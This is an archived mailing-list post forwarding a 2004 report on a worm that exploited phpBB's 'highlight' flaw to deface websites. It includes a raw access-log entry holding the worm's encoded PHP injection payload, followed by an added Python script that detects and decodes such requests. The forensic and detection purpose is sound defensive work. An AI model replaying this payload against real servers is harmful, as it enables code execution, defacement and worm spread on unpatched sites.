Hi list --

There's a new exploit hitting Web servers with PHP enabled. The 'sploit leaves clear signatures in Web server access logs; I've taken the liberty of forwarding a message from another list that includes forensics.

cheers, merry winter holidays --

tbird

> -----Original Message-----
> From: Shannon Lee [mailto:shannon@private]
> Sent: Monday, December 20, 2004 3:51 PM
> To: bugtraq@private
> Subject: phpBB Worm
>
>
> This morning one of our client's sites was found to have been
> defaced with the words "NeverEverNoSanity WebWorm Generation
> 9." The defacement appeared to take place on all .html files
> in the web root trees of multiple virtual hosts on the web
> server in a very short period of time.
>
> After some investigation, we determined that the attacker had
> gained access via phpbb in a series of crafted URL requests, like so:
>
> 64.235.234.84 - - [20/Dec/2004:08:41:35 -0800] "GET /viewtopic.php?p=9002&sid=f5399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efwrite(fopen(chr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102),chr(97)),chr(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%252echr(47)%252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(10)%252echr(117)%252echr(115)%252echr(101)%252echr(32)),exit%252e%2527 HTTP/1.0" 200 13648 "http://forum.CLIENT SITE OMITTED.com/viewtopic.php?p=9002&sid=f5399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efwrite(fopen(chr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102),chr(97)),chr(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%252echr(47)%252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(10)%252echr(117)%252echr(115)%252echr(101)%252echr(32)),exit%252e%2527" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
>
> After checking the phpbb site, it turns out that this is a
> vulnerability posted the 18th of November, called Hilight; we
> didn't update to prevent it because the client whose domain
> it was has their own admin, and we thought he was taking care
> of phpBB. Oops. The exploit is described here:
>
> http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
>
> When I copied all these entries out of the log and translated
> the chr() calls, they turned out to be the attached perl
> script, which is capable of finding .html files to deface,
> and then going to google and finding more instances of phpbb
> to infect. Which makes it a worm. It also tracks itself by
> generation; we were generation 9.
>
> Please find attached the above-mentioned script as well as
> the series of log entries from access_log.
>
> --Shannon
>
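The two steps Shannon describes (pulling the crafted viewtopic.php requests out of access_log, then translating the chr() calls) as a small log-scanning script. This is an added example, not code from the post or from phpBB; the sample log lines are constructed here from the request quoted above, with the referer and user-agent fields shortened, plus one benign highlight search for contrast.

```python
import re
from urllib.parse import unquote

# Client IP, timestamp and request line of a common/combined Apache log entry.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)"')
HIGHLIGHT_RE = re.compile(r'[?&]highlight=([^&\s]*)', re.IGNORECASE)
CHR_RE = re.compile(r'chr\((\d+)\)')

def is_highlight_exploit(path):
    # The worm double-encodes the closing quote (%2527) and the PHP dot (%252e) so they
    # survive phpBB's first urldecode(); a genuine search term never carries that plus chr().
    m = HIGHLIGHT_RE.search(path)
    if not m:
        return False
    value = m.group(1).lower()
    return "%2527" in value and "chr(" in value

def decode_payload(path):
    # Undo both encoding layers, expand each chr(N) and merge the '.'-joined literals.
    m = HIGHLIGHT_RE.search(path)
    if not m:
        return None
    php = unquote(unquote(m.group(1)))
    php = CHR_RE.sub(lambda c: "'" + chr(int(c.group(1))) + "'", php)
    return php.replace("'.'", "")

def scan(lines):
    # Return (ip, timestamp, decoded PHP) for every exploit request seen.
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        req = m.group("req").split() if m else []
        if len(req) >= 2 and is_highlight_exploit(req[1]):
            hits.append((m.group("ip"), m.group("ts"), decode_payload(req[1])))
    return hits

# Constructed sample: the request from the post (referer/UA shortened) plus a benign search.
EXPLOIT_PATH = (
    "/viewtopic.php?p=9002&sid=f5399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efwrite(fopen("
    "chr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102),chr(97)),"
    "chr(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%252echr(47)%252echr(98)"
    "%252echr(105)%252echr(110)%252echr(47)%252echr(112)%252echr(101)%252echr(114)%252echr(108)"
    "%252echr(10)%252echr(117)%252echr(115)%252echr(101)%252echr(32)),exit%252e%2527")
SAMPLE_LOG = [
    f'64.235.234.84 - - [20/Dec/2004:08:41:35 -0800] "GET {EXPLOIT_PATH} HTTP/1.0" 200 13648 "-" "Mozilla/4.0"',
    '10.1.2.3 - - [20/Dec/2004:08:42:10 -0800] "GET /viewtopic.php?t=12&highlight=perl HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Each matching request decodes to a short fwrite() that appends one fragment to a file in the web root, which is why the defacement shows up as a series of log entries rather than a single one.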
_______________________________________________
LogAnalysis mailing list
LogAnalysis@private
http://lists.shmoo.com/mailman/listinfo/loganalysis
This archive was generated by hypermail 2.1.3 : Tue Dec 21 2004 - 14:57:04 PST